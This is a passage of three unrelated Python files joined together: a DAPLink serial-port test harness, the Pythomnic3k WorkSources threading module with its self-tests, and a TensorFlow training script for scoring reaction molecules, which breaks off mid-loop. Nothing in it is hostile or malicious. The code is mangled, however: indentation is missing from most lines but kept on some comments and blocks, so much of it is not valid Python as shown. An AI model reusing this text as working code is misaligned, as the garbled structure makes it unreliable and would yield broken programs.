test_serial.py
#
# DAPLink Interface Firmware
# Copyright (c) 2009-2016, ARM Limited, All Rights Reserved
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
import queue
import functools
import serial
import threading
import time
ERROR_TIMEOUT_SECONDS = 10.0
def _same(d1, d2):
    # Do a string or bytearray compare
    return d1 == d2
# http://digital.ni.com/public.nsf/allkb/D37754FFA24F7C3F86256706005B9BE7
standard_test_baud_rates = [
9600,
14400,
19200,
28800,
38400,
#56000, #TODO - uncomment once daplink-validation supports 56000 on nrf5x
57600,
115200,
]
standard_timing_baud_rates = standard_test_baud_rates[3:]
quick_test_baud_rates = [9600, 115200]
quick_timing_baud_rates = [115200]
def calc_timeout(length, baud):
"""Calculate a timeout given the data and baudrate
Positional arguments:
length - size of data to be sent
baud - baud rate to send data
Calculate a reasonable timeout given the supplied parameters.
    This function adds slightly more time than is needed, to account
    for latency and various configurations.
"""
return 12 * float(length) / float(baud) + 0.2
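# Worked example (illustrative only, not used by the tests): a 4096-byte block
# at 9600 baud needs roughly 10 bits per byte on the wire, or about 4.27 s;
# calc_timeout(4096, 9600) = 12 * 4096 / 9600 + 0.2 ~= 5.32 s, i.e. roughly
# 20% of margin plus a fixed 0.2 s allowance for latency.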
class SerialTester(object):
"""Helper object to buffer serial and setup baud"""
def __init__(self, port):
self.raw_serial = serial.Serial(port=port, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None)
self.raw_serial.write_timeout = ERROR_TIMEOUT_SECONDS
self._queue = queue.Queue()
self._write_thread = threading.Thread(target=self._serial_main)
self._write_thread.start()
def __enter__(self):
return self
def __exit__(self, exception_type, value, traceback):
self._queue.put(None)
self._write_thread.join(ERROR_TIMEOUT_SECONDS)
assert not self._write_thread.is_alive(), "Thread join failed"
self.raw_serial.close()
self.raw_serial = None
return False
def new_session_with_baud(self, baud, parent_test):
"""Start a new session by restarting target and setting baud"""
test_info = parent_test.create_subtest("Set Baud")
# Set baud to 115200
self.raw_serial.baudrate = 115200
self.raw_serial.timeout = 1.0
# Reset the target
self.raw_serial.sendBreak()
self.raw_serial.reset_output_buffer()
self.raw_serial.reset_input_buffer()
# Wait until the target is initialized
expected_resp = "{init}"
resp = self.read(len(expected_resp))
if not _same(resp.decode(), expected_resp):
test_info.failure("Fail on init: %s" % resp)
return False
# Change baudrate to that of the first test
command = "{baud:%i}" % baud
self.write(command.encode())
resp = self.read(len(command))
if not _same(resp.decode(), command):
test_info.failure("Fail on baud command: %s" % resp)
return False
# Update baud of local serial port
self.raw_serial.baudrate = baud
# Read the response indicating that the baudrate
# on the target has changed
expected_resp = "{change}"
resp = self.read(len(expected_resp))
if not _same(resp.decode(), expected_resp):
test_info.failure("Fail on baud change %s" % resp)
return False
# Set default timeout
self.raw_serial.timeout = ERROR_TIMEOUT_SECONDS
# Success
return True
def read(self, length):
"""Read serial data"""
return self.raw_serial.read(length)
def write(self, data):
"""Write serial port data in the background"""
func = functools.partial(self.raw_serial.write, data)
self._queue.put(func)
def set_read_timeout(self, timeout):
"""Set timeout for read operations"""
assert self._queue.empty(), "Queue must be empty to change timeout"
self.raw_serial.timeout = timeout
def flush(self):
"""Wait for all writes to complete"""
self._queue.join()
assert self._queue.empty()
def _serial_main(self):
"""Write helper thread"""
while True:
task = self._queue.get(True)
if task is None:
self._queue.task_done()
# End of processing is an empty task
break
try:
task()
except serial.SerialTimeoutException:
pass
self._queue.task_done()
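# Minimal usage sketch (illustrative; PORT and parent_test are hypothetical
# placeholders, assuming a board running daplink-validation is attached):
#
#     with SerialTester(PORT) as sp:
#         if sp.new_session_with_baud(115200, parent_test):
#             sp.write(b"hello")
#             echoed = sp.read(5)
#             sp.flush()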
def test_serial(workspace, parent_test, quick=False):
"""Test the serial port endpoint
Requirements:
-daplink-validation must be loaded for the target.
    Positional arguments:
        workspace - the workspace containing the board to test
        parent_test - the parent test used to create subtests
    Keyword arguments:
        quick - when True, test only a reduced set of baud rates
Return:
True if the test passed, False otherwise
"""
test_info = parent_test.create_subtest("Serial test")
board = workspace.board
port = board.get_serial_port()
test_info.info("Testing serial port %s" % port)
# Note: OSX sends a break command when a serial port is closed.
# To avoid problems while testing keep the serial port open the
# whole time. Use the property 'baudrate' to change the baud
# instead of opening a new instance.
test_baud_rates = quick_test_baud_rates if quick else standard_test_baud_rates
timing_baud_rates = quick_timing_baud_rates if quick else standard_timing_baud_rates
with SerialTester(port) as sp:
# Generate a 4KB block of dummy data
# and test supported baud rates
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = bytearray(test_data)
for baud in test_baud_rates:
test_info.info("Testing baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
# Perform test
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(test_data, resp):
test_info.info("Pass")
else:
test_info.failure("Fail on baud %s" % baud)
# Timing stress test - send data at critical points
# in time like right as the transmitter is turned off
# ------------------
# Test sequence
# 1. Send a block of data (vary size for the test)
# 2. Wait until 1 byte is read back
# 3. Write 1 byte
# 4. Read back all data
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = bytearray(test_data)
for baud in timing_baud_rates:
test_info.info("Timing test baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
test_pass = True
for data_size in range(1, 10):
data = test_data[0:data_size + 1]
for _ in range(0, 1000):
resp = bytearray()
sp.write(data[0:data_size])
resp += sp.read(1)
sp.write(data[-1:])
resp += sp.read(data_size)
sp.flush()
if not _same(data, resp):
test_pass = False
test_info.info("fail size - %s" % data_size)
break
# Break if already failed
if not test_pass:
break
if test_pass:
test_info.info("Pass")
else:
test_info.failure("Fail on timing test with baud %s"
% baud)
        # Settings change smoke test - reconfigure settings while
        # in the middle of a transfer and verify nothing bad happens
test_data = [i for i in range(0, 128)]
test_data = bytearray(test_data)
sp.new_session_with_baud(115200, test_info)
sp.set_read_timeout(0)
for baud in test_baud_rates:
sp.raw_serial.baudrate = baud
sp.write(test_data)
xfer_time = float(len(test_data) * 10) / float(baud)
time.sleep(xfer_time / 2)
# Discard data
sp.read(1024)
# Read any leftover data
sp.flush()
sp.raw_serial.baudrate = 115200
sp.set_read_timeout(1.0)
sp.read(128 * len(test_baud_rates))
        # Generate an 8 KB block of dummy data
# and test a large block transfer
test_data = [i for i in range(0, 256)] * 4 * 8
test_data = bytearray(test_data)
sp.new_session_with_baud(115200, test_info)
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(resp, test_data):
test_info.info("Block test passed")
else:
test_info.failure("Block test failed")
# Refresh to check for asserts
board.refresh(test_info)
work_sources.py
#!/usr/bin/env python3
#-*- coding: iso-8859-1 -*-
################################################################################
#
# This module implements an interlocked thread-safe structure for tracking
# incoming work from multiple sources and allocating processing of the work.
#
# wss = WorkSources(number_of_sources, idle_timeout)
#
# Specifically, producer threads can indicate presence of work at Nth source
# by calling
#
# wss.add_work(N)
#
# and a consumer thread (which must be a HeavyThread) can poll for the presence of work
# at any source by calling
#
# (stopped, N) = wss.begin_work([timeout])
# ...use Nth source...
# wss.end_work(N)
#
# and the same source will not be returned from begin_work again until the client
# indicates end of processing by calling end_work.
#
# Two additional notes:
# 1. begin_work detects stopping of the calling thread and exits with a boolean flag.
# 2. if a source has had no work for idle_timeout, it is nevertheless
# returned from begin_work, presumably so that the caller can check the source
# manually.
#
# This module is written specifically to suit protocol_retry.py's needs,
# therefore it is hardly useful anywhere else.
#
# Pythomnic3k project
# (c) 2005-2014, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
################################################################################
__all__ = [ "WorkSources" ]
################################################################################
import threading; from threading import Lock, Event, current_thread
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..")))
import typecheck; from typecheck import typecheck, optional
import pmnc.timeout; from pmnc.timeout import Timeout
################################################################################
class _WorkSource:
@typecheck
def __init__(self, idle_timeout: float):
self._idle_timeout = Timeout(idle_timeout)
self._has_work = False
self._working = False
def add_work(self):
self._has_work = True
def begin_work(self):
if not self._working and (self._has_work or self._idle_timeout.expired):
self._has_work = False
self._working = True
return True
else:
return False
def end_work(self):
assert self._working
self._working = False
self._idle_timeout.reset()
################################################################################
class WorkSources:
@typecheck
def __init__(self, size: int, idle_timeout: float):
self._lock = Lock()
self._signal = Event()
self._idle_timeout = idle_timeout
self._sources = tuple(_WorkSource(idle_timeout) for i in range(size))
@typecheck
def add_work(self, i: int):
with self._lock:
self._sources[i].add_work()
self._signal.set()
@typecheck
def begin_work(self, timeout: optional(float) = None) -> (bool, optional(int)):
timeout = Timeout(timeout or self._idle_timeout + 1.0)
while not timeout.expired:
if current_thread().stopped():
return True, None
self._signal.wait(min(timeout.remain, 3.0)) # this may spend waiting slightly less, but it's ok
with self._lock:
for i, source in enumerate(self._sources):
if source.begin_work():
return False, i
else:
self._signal.clear()
else:
return False, None
@typecheck
def end_work(self, i: int):
with self._lock:
self._sources[i].end_work()
self._signal.set()
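# Minimal usage sketch (illustrative; mirrors the module header above). The
# consumer must run in a pmnc HeavyThread so that current_thread().stopped()
# is available, and source indices are 0-based:
#
#     wss = WorkSources(4, idle_timeout = 30.0)
#     wss.add_work(2)                       # producer side
#     stopped, i = wss.begin_work(10.0)     # consumer side (heavy thread)
#     if not stopped and i is not None:
#         ...                               # process source i
#         wss.end_work(i)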
################################################################################
if __name__ == "__main__":
print("self-testing module work_sources.py:")
###################################
from time import sleep
from expected import expected
from pmnc.threads import HeavyThread
###################################
def test_WorkSource_idle():
ws = _WorkSource(2.0)
assert not ws.begin_work()
sleep(1.2)
assert not ws.begin_work()
sleep(1.2)
assert ws.begin_work()
test_WorkSource_idle()
###################################
def test_WorkSource_working():
ws = _WorkSource(2.0)
assert not ws.begin_work()
ws.add_work()
assert ws.begin_work()
assert not ws.begin_work()
sleep(2.4) # cannot go idle while working
assert not ws.begin_work()
ws.end_work()
assert not ws.begin_work()
test_WorkSource_working()
###################################
def test_WorkSource_add_work():
ws = _WorkSource(2.0)
assert not ws.begin_work()
ws.add_work() # multiple calls to add_work count as one
ws.add_work()
ws.add_work()
assert ws.begin_work()
assert not ws.begin_work() # working
ws.end_work()
assert not ws.begin_work() # all work has been accounted for
ws.add_work()
assert ws.begin_work()
ws.add_work() # add_work while working will count later
ws.end_work()
assert ws.begin_work()
test_WorkSource_add_work()
###################################
def test_WorkSource_end_work():
ws = _WorkSource(2.0)
with expected(AssertionError):
ws.end_work()
ws.add_work()
with expected(AssertionError):
ws.end_work()
assert ws.begin_work()
ws.end_work()
with expected(AssertionError):
ws.end_work()
test_WorkSource_end_work()
###################################
def test_WorkSources_idle():
current_thread().stopped = lambda: False
wss = WorkSources(2, 2.0)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 0)
assert wss.begin_work(0.0) == (False, 1)
assert wss.begin_work(0.0) == (False, None)
assert wss.begin_work() == (False, None)
test_WorkSources_idle()
###################################
def test_WorkSources_add_work():
current_thread().stopped = lambda: False
wss = WorkSources(2, 2.0)
wss.add_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 1)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, None)
wss.add_work(0)
wss.end_work(1)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 1)
wss.add_work(1)
wss.end_work(1)
assert wss.begin_work(0.0) == (False, 1)
assert wss.begin_work(1.2) == (False, None)
wss.end_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(1.2) == (False, None)
test_WorkSources_add_work()
###################################
def test_WorkSources_stop_thread():
th_started = Event()
def th_proc():
wss = WorkSources(1, 30.0)
th_started.set()
assert wss.begin_work(10.0) == (True, None)
th = HeavyThread(target = th_proc)
th.start()
t = Timeout(30.0)
th_started.wait()
sleep(1.0)
th.stop()
assert t.remain > 25.0
test_WorkSources_stop_thread()
###################################
def test_WorkSources_timeout():
current_thread().stopped = lambda: False
wss = WorkSources(1, 30.0)
t = Timeout(10.0)
assert wss.begin_work(3.0) == (False, None)
assert abs(t.remain - 7.0) < 1.0
test_WorkSources_timeout()
###################################
def test_WorkSources_signal_kept():
current_thread().stopped = lambda: False
wss = WorkSources(4, 30.0)
wss.add_work(0)
wss.add_work(1)
wss.add_work(2)
wss.add_work(3)
t = Timeout(10.0)
assert wss.begin_work(1.0) == (False, 0)
assert wss.begin_work(1.0) == (False, 1)
assert wss.begin_work(1.0) == (False, 2)
assert wss.begin_work(1.0) == (False, 3)
assert t.remain > 9.0
assert wss.begin_work(3.0) == (False, None)
assert t.remain < 8.0
test_WorkSources_signal_kept()
###################################
def test_WorkSources_signal_kick():
th_started = Event()
th_got_work = Event()
wss = WorkSources(1, 30.0)
def th_proc():
th_started.set()
assert wss.begin_work(10.0) == (False, 0)
th_got_work.set()
th = HeavyThread(target = th_proc)
th.start()
th_started.wait()
t = Timeout(30.0)
wss.add_work(0)
th_got_work.wait()
assert t.remain > 29.0
th.stop()
test_WorkSources_signal_kick()
###################################
def test_WorkSources_end_work():
current_thread().stopped = lambda: False
wss = WorkSources(2, 30.0)
wss.add_work(1)
assert wss.begin_work(0.0) == (False, 1)
wss.add_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(0.0) == (False, None)
wss.add_work(1)
assert wss.begin_work(0.0) == (False, None)
th_started = Event()
th_got_work = Event()
def th_proc():
th_started.set()
assert wss.begin_work(10.0) == (False, 1)
th_got_work.set()
th = HeavyThread(target = th_proc)
th.start()
th_started.wait()
t = Timeout(30.0)
wss.end_work(1)
th_got_work.wait()
assert t.remain > 29.0, t.remain
th.stop()
test_WorkSources_end_work()
###################################
print("ok")
################################################################################
# EOF
nntrain_fingerprint.py
import tensorflow as tf
from utils.nn import linearND
import math, sys, random, os
import pickle  # needed below for caching the shuffled data list
from optparse import OptionParser
import threading
from multiprocessing import Queue, Process
import numpy as np
from Queue import Empty
import time
import h5py
from itertools import chain
project_root = os.path.dirname(os.path.dirname(__file__))
NK = 10
NK0 = 5
report_interval = 1
max_save = 30
min_iterations = 1000
score_scale = 5.0
min_separation = 0.25
FP_len = 1024
FP_rad = 2
parser = OptionParser()
parser.add_option("-t", "--train", dest="train_path", default=os.path.join(project_root, 'data', 'reaxys_limit10.txt'))
parser.add_option("--h5", dest="h5_suffix", default=".h5")
parser.add_option("-m", "--save_dir", dest="save_path", default=os.path.join(project_root, 'models', 'example_model'))
parser.add_option("-b", "--batch", dest="batch_size", default=16384)
parser.add_option("-w", "--hidden", dest="hidden_size", default=300)
parser.add_option("-d", "--depth", dest="depth", default=5)
parser.add_option("-l", "--max_norm", dest="max_norm", default=5.0)
parser.add_option("-u", "--device", dest="device", default="")
parser.add_option("--test", dest="test", default='')
parser.add_option("-v", "--verbose", dest="verbose_test", default=False)
parser.add_option("-c", "--checkpoint", dest="checkpoint", default="final")
parser.add_option("-s", "--saveint", dest="save_interval", default=0)
parser.add_option("-i", "--interactive", dest="interactive", default=False)
opts,args = parser.parse_args()
batch_size = int(opts.batch_size)
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
max_norm = float(opts.max_norm)
test = opts.test
save_interval = int(opts.save_interval)
verbose_test = bool(opts.verbose_test)
interactive_mode = bool(opts.interactive)
h5_suffix = opts.h5_suffix
if '2048' in h5_suffix:
FP_len = 2048
if interactive_mode:
batch_size = 2 # keep it small
if not os.path.isdir(opts.save_path):
os.mkdir(opts.save_path)
import rdkit.Chem.AllChem as AllChem
from rdkit import Chem  # Chem.MolFromSmiles / MolToSmiles are used below
if 'counts' not in opts.save_path and 'uint8' not in opts.h5_suffix:
# bool version
def mol_to_fp(mol, radius=FP_rad, nBits=FP_len):
if mol is None:
return np.zeros((nBits,), dtype=np.float32)
return np.array(AllChem.GetMorganFingerprintAsBitVect(mol, radius, nBits=nBits,
useChirality=True), dtype=np.bool)
else:
    # uint8 version (counts folded modulo nBits)
    dtype = np.uint8
    def mol_to_fp(mol, radius=FP_rad, nBits=FP_len, convFunc=np.array):
        if mol is None:
            return np.zeros((nBits,), dtype=dtype)
        fp = AllChem.GetMorganFingerprint(mol, radius, useChirality=True)  # UIntSparseIntVect
        fp_folded = np.zeros((nBits,), dtype=dtype)
        for k, v in fp.GetNonzeroElements().iteritems():
            fp_folded[k % nBits] += v
        return convFunc(fp_folded)
def smi_to_fp(smi, radius=FP_rad, nBits=FP_len):
if not smi:
return np.zeros((nBits,), dtype=np.float32)
return mol_to_fp(Chem.MolFromSmiles(smi), radius, nBits)
gpu_options = tf.GPUOptions(allow_growth=True, visible_device_list=opts.device)
with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as session:
_input_mol = tf.placeholder(tf.float32, [batch_size*2, FP_len])
sa_target = tf.placeholder(tf.float32, [batch_size*2,])
q = tf.FIFOQueue(20, [tf.float32], shapes=[[batch_size*2, FP_len]]) # fixed size
enqueue = q.enqueue(_input_mol)
input_mol = q.dequeue()
src_holder = [input_mol]
input_mol.set_shape([batch_size*2, FP_len])
mol_hiddens = tf.nn.relu(linearND(input_mol, hidden_size, scope="encoder0"))
for d in xrange(1, depth):
mol_hiddens = tf.nn.relu(linearND(mol_hiddens, hidden_size, scope="encoder%i"%d))
score_sum = linearND(mol_hiddens, 1, scope="score_sum")
score_sum = tf.squeeze(score_sum)
score = 1.0 + (score_scale - 1.0) * tf.nn.sigmoid(score_sum)
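    # the sigmoid keeps every predicted score inside (1.0, score_scale), i.e. (1, 5) here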
# For evaluation only - get SSE against a target
sse = tf.reduce_sum(tf.square(score - sa_target))
pm_one = tf.constant([-1, 1], dtype=tf.float32)
reshape_score = tf.reshape(score, [batch_size, 2])
reshape_score = tf.multiply(reshape_score, pm_one) # products minus reactants
diff_score = tf.reduce_sum(reshape_score, axis=-1)
# shifted ReLU loss (like hinge loss)
# want to have positive diff score - min_separation > 0
loss = tf.nn.relu(min_separation - diff_score)
loss = tf.reduce_sum(loss)
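    # per (reactant, product) pair this is max(0, min_separation - (score_p - score_r)),
    # i.e. zero once the product outscores the reactant by at least min_separation (0.25)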
# For normal reaction-wise training
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
param_norm = tf.global_norm(tf.trainable_variables())
grads_and_vars = optimizer.compute_gradients(loss / batch_size)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
grads_and_vars = zip(new_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)
# For training if exact values known (unused)
sse_grads_and_vars = optimizer.compute_gradients(sse / batch_size / 2.0)
sse_grads, sse_var = zip(*sse_grads_and_vars)
sse_grad_norm = tf.global_norm(sse_grads)
sse_new_grads, _ = tf.clip_by_global_norm(sse_grads, max_norm)
sse_grads_and_vars = zip(sse_new_grads, sse_var)
sse_backprop = optimizer.apply_gradients(sse_grads_and_vars)
tf.global_variables_initializer().run(session=session)
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
queue = Queue()
def read_data_once(path, coord, frag='valid'):
if os.path.isfile(path + '.pkl'):
with open(path + '.pkl', 'r') as fid:
data = pickle.load(fid)
else:
data = []
with open(path, 'r') as f:
for line in f:
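                    # each line holds a reaction SMILES ("reactants>>product"),
                    # a count n and an id, separated by single spaces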
rex, n, _id = line.strip("\r\n").split(' ')
r,p = rex.split('>>')
if ('.' in p) or (not p):
continue # do not allow multiple products or none
n = int(n)
for r_splt in r.split('.'):
if r_splt:
data.append((_id, n, r_splt, p))
random.seed(123)
random.shuffle(data)
with open(path + '.pkl', 'w') as fid:
data = pickle.dump(data, fid, -1)
# h5py was generated post-shuffle
f = h5py.File(path + h5_suffix, 'r')
data_fps = f['data_fps']
data_len = len(data)
print('After splitting, %i total data entries' % data_len)
if frag == 'train':
data = data[:int(0.8 * data_len)]
h5_offset = 0*2
data_len = len(data)
print('Taking pseudo-random 0.8 as training set (%i)' % data_len)
elif frag == 'valid':
data = data[int(0.8 * data_len):int(0.9 * data_len)]
h5_offset = int(0.8 * data_len)*2
data_len = len(data)
print('Taking pseudo-random 0.1 as validation set (%i)' % data_len)
elif frag == 'test':
data = data[int(0.9 * data_len):]
h5_offset = int(0.9 * data_len)*2
data_len = len(data)
print('Taking pseudo-random 0.1 as test set (%i)' % data_len)
else:
raise ValueError('Unknown data frag type')
print('h5 offset: {}'.format(h5_offset))
it = 0
src_mols = np.zeros((batch_size*2, FP_len), dtype=np.float32)
while it < data_len:
# Try to get all FPs in one read (faster)
if (it + batch_size) <= data_len:
src_batch = list(chain.from_iterable((data[i][2], data[i][3]) for i in xrange(it, it + batch_size)))
ids_batch = [data[i][0] for i in xrange(it, it + batch_size)]
src_mols[:, :] = data_fps[h5_offset+2*it:h5_offset+2*(it+batch_size), :]
it = it + batch_size
            # If we are at the end, do one-by-one and pad out the final
            # partial batch (padding rows reuse the last r/p/_id values and
            # get all-zero fingerprints)
            else:
                src_batch = []
                ids_batch = []
                for i in xrange(batch_size):
                    if it >= data_len:
                        src_batch.append(r)
                        src_batch.append(p)
                        ids_batch.append(_id)
                        src_mols[2*i:2*i+2, :] = np.zeros((2, FP_len))
else:
_id, n, r, p = data[it]
src_batch.append(r)
src_batch.append(p)
ids_batch.append(_id)
src_mols[2*i:2*i+2, :] = data_fps[h5_offset+2*it:h5_offset+2*it+2, :]
it = it + 1
session.run(enqueue, feed_dict={_input_mol: src_mols})
queue.put((ids_batch, src_batch))
# Stop signal for testing
queue.put((None, None))
coord.request_stop()
def read_data_master(path, coord):
if not os.path.isfile(path + h5_suffix):
quit('Need to run .h5 script first to get FPs')
if os.path.isfile(path + '.pkl'):
with open(path + '.pkl', 'r') as fid:
data = pickle.load(fid)
else:
data = []
with open(path, 'r') as f:
for line in f:
rex, n, _id = line.strip("\r\n").split(' ')
r,p = rex.split('>>')
if ('.' in p) or (not p):
continue # do not allow multiple products or none
n = int(n)
for r_splt in r.split('.'):
if r_splt:
data.append((_id, n, r_splt, p))
random.seed(123)
random.shuffle(data)
with open(path + '.pkl', 'w') as fid:
data = pickle.dump(data, fid, -1)
# h5py is post-shuffle
f = h5py.File(path + h5_suffix, 'r')
data_fps = f['data_fps']
data_len = len(data)
print('After splitting, %i total data entries' % data_len)
print('...slicing data')
data = data[:int(0.8 * data_len)]
print('...NOT slicing h5 FP dataset, but defining offset (= 0)')
h5_offset = 0
data_len = len(data)
print('Taking pseudo-random 0.8 for training (%i)' % data_len)
it = 0;
src_mols = np.zeros((batch_size*2, FP_len), dtype=np.float32)
while not coord.should_stop():
# Try to get all FPs in one read (faster)
if (it + batch_size) <= data_len:
src_batch = list(chain.from_iterable((data[i][2], data[i][3]) for i in xrange(it, it + batch_size)))
ids_batch = [data[i][0] for i in xrange(it, it + batch_size)]
src_mols[:, :] = data_fps[h5_offset+2*it:h5_offset+2*(it+batch_size), :]
it = (it + batch_size) % data_len
            # If we are at the end (where we need to loop around), do one-by-one
else:
src_batch = []
ids_batch = []
for i in xrange(batch_size):
_id, n, r, p = data[it]
src_batch.append(r)
src_batch.append(p)
ids_batch.append(_id)
src_mols[2*i:2*i+2, :] = data_fps[h5_offset+2*it:h5_offset+2*it+2, :]
it = (it + 1) % data_len
session.run(enqueue, feed_dict={_input_mol: src_mols})
queue.put((ids_batch, src_batch))
print('Queue size: {}'.format(queue.qsize()))
sys.stdout.flush()
coord.request_stop()
f.close()
def dummy_thread():
return
coord = tf.train.Coordinator()
if interactive_mode:
all_threads = [threading.Thread(target=dummy_thread)]
elif test:
all_threads = [threading.Thread(target=read_data_once, args=(opts.train_path, coord), kwargs={'frag': opts.test})]
else:
all_threads = [threading.Thread(target=read_data_master, args=(opts.train_path, coord))]
print('Added read_data_master')
[t.start() for t in all_threads]
if not interactive_mode:
data_len = 0
with open(opts.train_path, 'r') as f:
for line in f:
data_len += 1
print('Data length: %i' % data_len)
if save_interval == 0: # approx once per epoch
save_interval = np.ceil(data_len / float(batch_size))
saver = tf.train.Saver(max_to_keep=None)
if test or interactive_mode:
if opts.checkpoint:
restore_path = os.path.join(opts.save_path, 'model.%s' % opts.checkpoint)
else:
restore_path = tf.train.latest_checkpoint(opts.save_path)
saver.restore(session, restore_path)
print('Restored values from latest saved file ({})'.format(restore_path))
        test_path = '%s.predicted.%s.%s' % (restore_path, os.path.basename(opts.train_path), str(opts.test))
summary_path = os.path.join(opts.save_path, 'model.%s.summary' % os.path.basename(opts.train_path))
it, sum_diff, sum_gnorm, sum_diff_is_pos = 0, 0.0, 0.0, 0.0
sum_loss = 0.0; sum_diff_is_big = 0.0
lr = 0.001
try:
if interactive_mode:
prompt = raw_input('enter a tag for this session: ')
interactive_path = '%s.interactive.%s' % (restore_path, prompt.strip())
fid = open(interactive_path, 'a')
def get_score_from_smi(smi):
if not smi:
return ('', 0.)
src_batch = [smi]
while len(src_batch) != (batch_size * 2): # round out last batch
src_batch.append('')
src_mols = np.array(map(smi_to_fp, src_batch), dtype=np.float32)
if sum(sum(src_mols)) == 0:
print('Could not get fingerprint?')
cur_score = [0.]
else:
# Run
cur_score, = session.run([score], feed_dict={
input_mol: src_mols,
_lr: 0.001,
})
print('Score: {}'.format(cur_score[0]))
mol = Chem.MolFromSmiles(smi)
if mol:
smi = Chem.MolToSmiles(mol, isomericSmiles=True, kekuleSmiles=True)
else:
smi = ''
return (smi, cur_score[0])
while True:
try:
prompt = raw_input('\nEnter SMILES (or quit): ')
if prompt.strip() == 'quit':
break
if str('>') in prompt: # reaction
reactants = prompt.strip().split('>')[0].split('.')
reactants_smi = []
reactants_score = 0.
for reactant in reactants:
(smi, cur_score) = get_score_from_smi(reactant)
reactants_smi.append(smi)
reactants_score = max(reactants_score, cur_score)
products = prompt.strip().split('>')[2].split('.')
products_smi = []
products_score = 0.
for product in products:
(smi, cur_score) = get_score_from_smi(product)
products_smi.append(smi)
products_score = max(products_score, cur_score)
smi = '{}>>{}'.format('.'.join(reactants_smi), '.'.join(products_smi))
fid.write('%s %s %.4f %.4f %.4f\n' % (prompt.strip(), smi, reactants_score, products_score, products_score-reactants_score))
else: # single or list of mols
reactants = prompt.strip().split('.')
reactants_smi = []
reactants_score = 0.
for reactant in reactants:
(smi, cur_score) = get_score_from_smi(reactant)
reactants_smi.append(smi)
reactants_score = max(reactants_score, cur_score)
fid.write('%s %s %.4f\n' % (prompt.strip(), '.'.join(reactants_smi), reactants_score))
except KeyboardInterrupt:
print('Breaking out of prompt')
fid.close()
raise KeyboardInterrupt
except Exception as e:
print(e)
fid.write('%s\n' % prompt.strip())
continue
elif test:
while queue.qsize() == 0:
print('Letting queue fill up (5 s...)')
time.sleep(5)
summarystring = ''
ctr = 0.0
if verbose_test:
learned_scores = []
sum_diff_is_pos = 0.0
sum_diff_is_big = 0.0
sum_diff = 0.0
sum_gnorm = 0.0
sum_loss = 0.0
while True:
try:
(ids_batch, src_batch) = queue.get(timeout=120)
if src_batch is None:
raise Empty
cur_diff, cur_score, cur_loss = session.run([diff_score, score, loss])
it += 1
for _id in ids_batch:
if _id > 0:
ctr += 1
sum_diff_is_pos += np.sum(cur_diff > 0)
sum_diff_is_big += np.sum(cur_diff > min_separation)
sum_diff += np.sum(cur_diff)
sum_loss += cur_loss
if verbose_test:
for i in range(len(ids_batch)):
learned_scores.append(cur_score[2*i])
learned_scores.append(cur_score[i*2+1])
if it % report_interval == 0:
summarystring = "for %6i pairs, DiffIsPos: %.4f, DiffIs%.2f: %.4f, Loss: %.4f" % \
(ctr, sum_diff_is_pos / ctr, min_separation,
sum_diff_is_big / ctr, sum_loss / ctr)
print(summarystring)
sys.stdout.flush()
except Empty:
print('End of data queue I think...have seen {} examples'.format(ctr))
break
summarystring = "for %6i pairs, DiffIsPos: %.4f, DiffIs%.2f: %.4f, Loss: %.4f" % \
(ctr, sum_diff_is_pos / ctr, min_separation,
sum_diff_is_big / ctr, sum_loss / ctr)
print(summarystring)
sys.stdout.flush()
fidsum = open(summary_path, 'a')
fidsum.write('[%s-%s] %s\n' % (opts.checkpoint, opts.test, summarystring))
fidsum.close()
if verbose_test:
fid = h5py.File(test_path + '.h5', 'w')
dset = fid.create_dataset('learned_scores', (len(learned_scores),), dtype=np.float32)
dset[:] = np.array(learned_scores)
fid.close()
else:
hist_fid = open(opts.save_path + "/model.hist", "a")
print('Letting queue fill up (10 s)')
time.sleep(10)
while not coord.should_stop():
it += 1
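                # the reader thread enqueues fingerprints into the TF FIFOQueue and the
                # matching (ids, SMILES) batch into the Python queue in the same order,
                # so this session.run / queue.get pair always describes the same batch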
_, cur_diff, cur_score, pnorm, gnorm, cur_loss = session.run([backprop, diff_score, score, param_norm, grad_norm, loss], feed_dict={_lr:lr})
(ids_batch, src_batch) = queue.get()
sum_diff_is_pos += np.sum(cur_diff > 0)
sum_diff_is_big += np.sum(cur_diff > min_separation)
sum_diff += np.sum(cur_diff)
sum_gnorm += gnorm
